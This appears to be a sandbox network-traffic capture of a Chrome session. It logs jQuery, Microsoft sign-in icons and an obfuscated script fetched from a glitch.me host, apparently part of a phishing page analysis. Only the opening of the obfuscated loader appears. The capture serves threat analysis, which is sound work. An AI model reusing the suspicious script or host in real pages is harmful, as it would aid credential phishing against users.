2024-07-03 19:20:04 UTC	569	IN	HTTP/1.1 200 OK Connection: close Content-Length: 86709 Server: nginx Content-Type: application/javascript; charset=utf-8 Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT ETag: "28feccc0-152b5" Cache-Control: public, max-age=31536000, stale-while-revalidate=604800 Access-Control-Allow-Origin: * Via: 1.1 varnish, 1.1 varnish Accept-Ranges: bytes Age: 1308450 Date: Wed, 03 Jul 2024 19:20:03 GMT X-Served-By: cache-lga21947-LGA, cache-nyc-kteb1890045-NYC X-Cache: HIT, HIT X-Cache-Hits: 2505, 0 X-Timer: S1720034404.976913,VS0,VE1 Vary: Accept-Encoding
2024-07-03 19:20:04 UTC	1378	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 31 2e 31 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 Data Ascii: /! jQuery v3.1.1 \| (c) jQuery Foundation \| jquery.org/license /!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window w
2024-07-03 19:20:04 UTC	1378	IN	Data Raw: 3e 3d 30 26 26 63 3c 62 3f 5b 74 68 69 73 5b 63 5d 5d 3a 5b 5d 29 7d 2c 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 7c 7c 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7d 2c 70 75 73 68 3a 68 2c 73 6f 72 74 3a 63 2e 73 6f 72 74 2c 73 70 6c 69 63 65 3a 63 2e 73 70 6c 69 63 65 7d 2c 72 2e 65 78 74 65 6e 64 3d 72 2e 66 6e 2e 65 78 74 65 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 7c 7c 7b 7d 2c 68 3d 31 2c 69 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6a 3d 21 31 3b 66 6f 72 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 67 26 26 28 6a 3d 67 2c 67 3d 61 72 67 75 6d 65 6e 74 73 Data Ascii: >=0&&c<b?[this[c]]:[])},end:function(){return this.prevObject\|\|this.constructor()},push:h,sort:c.sort,splice:c.splice},r.extend=r.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]\|\|{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments
2024-07-03 19:20:04 UTC	1378	IN	Data Raw: 6e 20 61 2e 6e 6f 64 65 4e 61 6d 65 26 26 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 3d 30 3b 69 66 28 77 28 61 29 29 7b 66 6f 72 28 63 3d 61 2e 6c 65 6e 67 74 68 3b 64 3c 63 3b 64 2b 2b 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 64 20 69 6e 20 61 29 69 66 28 62 2e 63 61 6c 6c 28 61 5b 64 5d 2c 64 2c 61 5b 64 5d 29 3d 3d 3d 21 31 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 61 7d 2c 74 72 69 6d 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 22 22 3a 28 61 2b 22 22 29 2e Data Ascii: n a.nodeName&&a.nodeName.toLowerCase()===b.toLowerCase()},each:function(a,b){var c,d=0;if(w(a)){for(c=a.length;d<c;d++)if(b.call(a[d],d,a[d])===!1)break}else for(d in a)if(b.call(a[d],d,a[d])===!1)break;return a},trim:function(a){return null==a?"":(a+"").
2024-07-03 19:20:04 UTC	1378	IN	Data Raw: 61 72 72 61 79 22 3d 3d 3d 63 7c 7c 30 3d 3d 3d 62 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 62 3e 30 26 26 62 2d 31 20 69 6e 20 61 29 7d 76 61 72 20 78 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 2c 63 2c 64 2c 65 2c 66 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 2c 70 2c 71 2c 72 2c 73 2c 74 2c 75 3d 22 73 69 7a 7a 6c 65 22 2b 31 2a 6e 65 77 20 44 61 74 65 2c 76 3d 61 2e 64 6f 63 75 6d 65 6e 74 2c 77 3d 30 2c 78 3d 30 2c 79 3d 68 61 28 29 2c 7a 3d 68 61 28 29 2c 41 3d 68 61 28 29 2c 42 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 26 26 28 6c 3d 21 30 29 2c 30 7d 2c 43 3d 7b 7d 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 44 3d 5b 5d 2c 45 3d 44 2e 70 6f 70 2c 46 3d 44 2e Data Ascii: array"===c\|\|0===b\|\|"number"==typeof b&&b>0&&b-1 in a)}var x=function(a){var b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u="sizzle"+1*new Date,v=a.document,w=0,x=0,y=ha(),z=ha(),A=ha(),B=function(a,b){return a===b&&(l=!0),0},C={}.hasOwnProperty,D=[],E=D.pop,F=D.
2024-07-03 19:20:04 UTC	1378	IN	Data Raw: 70 28 22 5e 22 2b 4b 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 4b 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 57 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61 72 65 61 7c 62 75 74 74 6f 6e 29 24 2f 69 2c 58 3d 2f 5e 68 5c 64 24 2f 69 2c 59 3d 2f 5e 5b 5e 7b 5d 2b 5c 7b 5c 73 2a 5c 5b 6e 61 74 69 76 65 20 5c 77 2f 2c 5a 3d 2f 5e 28 3f 3a 23 28 5b 5c 77 2d 5d 2b 29 7c 28 5c 77 2b 29 7c 5c 2e 28 5b 5c 77 2d 5d 2b 29 29 24 2f 2c 24 3d 2f 5b 2b 7e 5d 2f 2c 5f 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 28 5b 5c 5c 64 61 Data Ascii: p("^"+K+"[>+~]\|:(even\|odd\|eq\|gt\|lt\|nth\|first\|last)(?:\$"+K+"((?:-\\d)?\\d)"+K+"\$\|)(?=[^-]\|$)","i")},W=/^(?:input\|select\|textarea\|button)$/i,X=/^h\d$/i,Y=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)\|(\w+)\|\.([\w-]+))$/,$=/[+~]/,_=new RegExp("\\\\([\\da
2024-07-03 19:20:04 UTC	1378	IN	Data Raw: 5b 33 5d 29 26 26 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 29 72 65 74 75 72 6e 20 47 2e 61 70 70 6c 79 28 64 2c 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 66 29 29 2c 64 7d 69 66 28 63 2e 71 73 61 26 26 21 41 5b 61 2b 22 20 22 5d 26 26 28 21 71 7c 7c 21 71 2e 74 65 73 74 28 61 29 29 29 7b 69 66 28 31 21 3d 3d 77 29 73 3d 62 2c 72 3d 61 3b 65 6c 73 65 20 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 62 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 28 6b 3d 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 6b 3d 6b 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3a 62 2e 73 65 74 Data Ascii: [3])&&c.getElementsByClassName&&b.getElementsByClassName)return G.apply(d,b.getElementsByClassName(f)),d}if(c.qsa&&!A[a+" "]&&(!q\|\|!q.test(a))){if(1!==w)s=b,r=a;else if("object"!==b.nodeName.toLowerCase()){(k=b.getAttribute("id"))?k=k.replace(ba,ca):b.set
2024-07-03 19:20:04 UTC	1378	IN	Data Raw: 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 62 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 61 7c 7c 62 2e 69 73 44 69 73 61 62 6c 65 64 21 3d 3d 21 61 26 26 65 61 28 62 29 3d 3d 3d 61 3a 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 3a 22 6c 61 62 65 6c 22 69 6e 20 62 26 26 62 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 61 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 61 28 61 29 7b 72 65 74 75 72 6e 20 69 61 28 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 3d 2b 62 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 76 61 72 20 65 2c 66 3d 61 28 5b 5d 2c 63 2e 6c 65 6e 67 74 68 2c 62 29 2c 67 3d 66 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 67 2d 2d 29 63 5b 65 3d 66 5b 67 5d 5d 26 26 28 63 5b 65 5d 3d 21 28 64 5b 65 Data Ascii: e.disabled===a:b.disabled===a:b.isDisabled===a\|\|b.isDisabled!==!a&&ea(b)===a:b.disabled===a:"label"in b&&b.disabled===a}}function pa(a){return ia(function(b){return b=+b,ia(function(c,d){var e,f=a([],c.length,b),g=f.length;while(g--)c[e=f[g]]&&(c[e]=!(d[e
2024-07-03 19:20:04 UTC	1378	IN	Data Raw: 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 63 26 26 63 2e 76 61 6c 75 65 3d 3d 3d 62 7d 7d 2c 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 2c 64 2c 65 2c 66 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 69 66 28 66 29 7b 69 66 28 63 3d 66 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 2c 63 26 26 63 2e 76 61 6c 75 65 Data Ascii: n function(a){var c="undefined"!=typeof a.getAttributeNode&&a.getAttributeNode("id");return c&&c.value===b}},d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c,d,e,f=b.getElementById(a);if(f){if(c=f.getAttributeNode("id"),c&&c.value
2024-07-03 19:20:04 UTC	1378	IN	Data Raw: 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 2f 3e 3c 2f 73 65 6c 65 63 74 3e 22 3b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4b 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 32 21 3d 3d 61 2e 71 75 65 72 79 53 Data Ascii: bled='disabled'></a><select disabled='disabled'><option/></select>";var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+K+"[^$\|!~]?="),2!==a.queryS
2024-07-03 19:20:04 UTC	1378	IN	Data Raw: 44 6f 63 75 6d 65 6e 74 3d 3d 3d 76 26 26 74 28 76 2c 62 29 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3a 34 26 64 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 3d 3d 3d 62 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 63 2c 64 3d 30 2c 65 3d 61 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 49 28 6b 2c 61 29 2d 49 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6c 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e Data Ascii: Document===v&&t(v,b)?1:k?I(k,a)-I(k,b):0:4&d?-1:1)}:function(a,b){if(a===b)return l=!0,0;var c,d=0,e=a.parentNode,f=b.parentNode,g=[a],h=[b];if(!e\|\|!f)return a===n?-1:b===n?1:e?-1:f?1:k?I(k,a)-I(k,b):0;if(e===f)return la(a,b);c=a;while(c=c.parentNode)g.un

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	13.107.246.60	443	5312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:03 UTC	621	OUT	GET /shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 19:20:04 UTC	799	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 19:20:03 GMT Content-Type: image/svg+xml Content-Length: 199 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:39 GMT ETag: 0x8D79B8374CE7F93 x-ms-request-id: c3d3c745-801e-0007-0c64-cdaf35000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240703T192003Z-157bfc59976f8smwu7npa5yb4w0000000c1000000000rr6t x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-07-03 19:20:04 UTC	199	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 75 8f bd ae c2 30 0c 85 5f 25 32 6b d5 38 3f 88 80 92 0e 77 ea 00 6b 87 bb 21 08 4d a4 d2 22 62 35 3c fe 4d 2e 62 44 b6 e4 63 fb d3 b1 6c d3 3a b2 d7 7d 9a 93 83 40 f4 38 70 9e 73 6e b3 6a 97 e7 c8 25 22 f2 42 00 cb f1 4a c1 81 36 c0 82 8f 63 a0 b7 5e a3 cf 3f cb cb 01 32 64 da 94 84 ce 52 a4 c9 77 e7 94 3c 25 cb df 9d 7d fa 0b 7d 73 b9 c5 69 72 30 2f b3 07 de d9 c7 99 02 bb 3a 38 29 d3 28 1c 84 ec 05 0e 0a 83 5e 75 bb dd 99 a3 30 b5 94 55 af cc 49 c8 46 c9 de 0c 02 7b 5d a8 c2 ee 5b 2d e5 b1 ce ff d5 ef c7 7e a3 b1 46 bd 50 5f ea fe 00 a3 0d 47 ef fa 00 00 00 Data Ascii: u0_%2k8?wk!M"b5<M.bDcl:}@8psnj%"BJ6c^?2dRw<%}}sir0/:8)(^u0UIF{][-~FP_G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	13.107.246.60	443	5312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:03 UTC	622	OUT	GET /shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 19:20:04 UTC	806	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 19:20:03 GMT Content-Type: image/svg+xml Content-Length: 1173 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 17 Jan 2020 19:28:39 GMT ETag: 0x8D79B83749623C9 x-ms-request-id: 2439d381-c01e-0012-032b-cc03b8000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240703T192003Z-157bfc5997664n58z75k33ycmc0000000dh000000000fa1h x-fd-int-roxy-purgeid: 4554691 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-07-03 19:20:04 UTC	1173	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 75 56 cb 6e 24 37 0c fc 95 c1 e4 da ad 69 52 d4 2b b0 0d 4c 4e 39 ac 6f 41 0e b9 35 b2 b3 1e 03 8e bd b3 6e 78 f6 f3 53 14 a5 de 6c dc 86 dd 25 5b d4 83 2a 16 29 dd bc be 3d ec be ff f3 f4 fc 7a bb 3f 2f cb d7 5f 0f 87 eb f5 ea ae de bd 7c 7b 38 f0 34 4d 07 8c d8 ef ae 8f 9f 97 f3 ed 5e f2 7e 77 3e 3d 3e 9c 17 fb fb ed f1 74 fd ed e5 fb ed 7e da 4d 3b c9 f8 dd df dd 2c 8f cb d3 e9 6e 7e 7d 3d 2d af 37 07 fb ef e6 db e9 ef e5 a3 55 be 3c 3e 3d dd ee 9f 5f 9e 4f fb c3 dd cd d7 79 39 ef 3e df ee ef fd e4 84 79 e0 e2 a6 c2 b3 77 52 fc 60 38 e1 87 06 72 9e c5 71 24 f4 fa dc b1 db c8 b3 4b 52 2e ce c7 58 bf cc c9 a5 14 16 57 a4 b8 1c e4 e2 24 67 27 22 e8 20 57 3c cf c5 95 24 83 a1 2d e3 32 95 81 8e 18 12 68 30 34 83 4f 83 17 97 7c Data Ascii: uVn$7iR+LN9oA5nxSl%[*)=z?/_\|{84M^~w>=>t~M;,n~}=-7U<>=_Oy9>ywR`8rq$KR.XW$g'" W<$-2h04O\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	13.107.246.60	443	5312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:04 UTC	638	OUT	GET /shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg HTTP/1.1 Host: aadcdn.msauth.net Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 19:20:04 UTC	800	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 19:20:04 GMT Content-Type: image/svg+xml Content-Length: 2407 Connection: close Cache-Control: public, max-age=31536000 Content-Encoding: gzip Last-Modified: Fri, 11 Mar 2022 11:11:29 GMT ETag: 0x8DA034FE445C10D x-ms-request-id: feb9a0a9-701e-0061-2c68-cde015000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding Access-Control-Allow-Origin: * x-azure-ref: 20240703T192004Z-157bfc59976pjpd267bfvppp200000000fag00000000fbh5 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-07-03 19:20:04 UTC	2407	IN	Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed 59 3d 73 dd 38 12 cc af ea fe 03 eb 6d 72 17 88 02 66 f0 79 b5 ba e0 98 38 a0 52 05 ca ec 95 6c ab 4e 6b bb 6c af b5 3f ff ba 07 e0 7b 24 94 6c 7c 65 27 7a 4d 02 33 c3 c1 a0 a7 01 ff fa ed c7 87 e9 e5 e9 e1 fb c7 9b 53 28 a7 e9 e3 e3 d3 87 8f df db ef 1f 4f 8f 2f ff f9 fc e7 cd c9 4d 6e 0a 65 e2 b3 f7 4f cf cf 37 a7 4f 9f 3f 3d 9e a6 3f 7f 7f fe f4 ed e6 f4 f1 fb f7 2f ff ba be 7e 79 79 99 5f 74 fe fc f5 c3 b5 38 e7 ae 61 f8 f4 ef bf ff ed d7 df df 7e fb ef f4 f4 00 2b f9 9d 24 a7 e1 2a a6 b7 7a 15 ea 83 5c 95 f7 92 ae 7e cb ef 4a 78 7c 17 1e 1f 1f c2 e6 e0 97 f7 f6 cf 0c 7c 79 fb fd a3 3d be fa fa c7 f3 e3 cd e9 f1 c7 e3 a7 cf 0f 0f a7 e9 b7 e7 a7 2f e3 33 f8 b9 15 9d 6b 4e 32 b9 c5 a7 b9 48 08 08 df 3b 3c 73 79 8a b3 04 Data Ascii: Y=s8mrfy8RlNkl?{$l\|e'zM3S(O/MneO7O?=?/~yy_t8a~+$*z\~Jx\|\|y=/3kN2H;<sy

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	44.197.227.46	443	5312	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-03 19:20:05 UTC	593	OUT	GET /set.js HTTP/1.1 Host: rounded-screeching-script.glitch.me Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-03 19:20:05 UTC	520	IN	HTTP/1.1 200 OK Date: Wed, 03 Jul 2024 19:20:05 GMT Content-Type: application/javascript; charset=utf-8 Content-Length: 86375 Connection: close x-amz-id-2: xE06rPG8eRZKxJMBCp/lYF94LpNbYG3e1yIwNXEdMTg7Z+Dw1MGnhIqZXigZBHFlwnO7tnpMcsM= x-amz-request-id: 4KMSW4WMZQ3DRR90 last-modified: Sun, 30 Jun 2024 18:08:48 GMT etag: "3c251732c3853cdf318bd284937a5c15" x-amz-server-side-encryption: AES256 cache-control: no-cache x-amz-version-id: h4637CMqY_cWlBlrPhF_Hx56GMpvoGjX accept-ranges: bytes server: AmazonS3
2024-07-03 19:20:05 UTC	8429	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 39 38 62 28 5f 30 78 34 62 64 39 37 31 2c 5f 30 78 37 66 62 61 36 63 29 7b 76 61 72 20 5f 30 78 35 31 30 65 36 39 3d 5f 30 78 31 35 63 37 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 31 39 38 62 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 31 64 64 61 35 2c 5f 30 78 31 66 30 66 62 30 29 7b 5f 30 78 32 31 64 64 61 35 3d 5f 30 78 32 31 64 64 61 35 2d 28 2d 30 78 32 38 35 2b 2d 30 78 32 34 37 39 2b 30 78 32 37 66 35 29 3b 76 61 72 20 5f 30 78 31 35 63 34 30 63 3d 5f 30 78 35 31 30 65 36 39 5b 5f 30 78 32 31 64 64 61 35 5d 3b 69 66 28 5f 30 78 31 39 38 62 5b 27 6b 73 71 71 52 70 27 5d 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 76 61 72 20 5f 30 78 61 64 65 34 33 64 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 61 65 66 66 38 64 29 7b 76 Data Ascii: function _0x198b(_0x4bd971,_0x7fba6c){var _0x510e69=_0x15c7();return _0x198b=function(_0x21dda5,_0x1f0fb0){_0x21dda5=_0x21dda5-(-0x285+-0x2479+0x27f5);var _0x15c40c=_0x510e69[_0x21dda5];if(_0x198b['ksqqRp']===undefined){var _0xade43d=function(_0xaeff8d){v
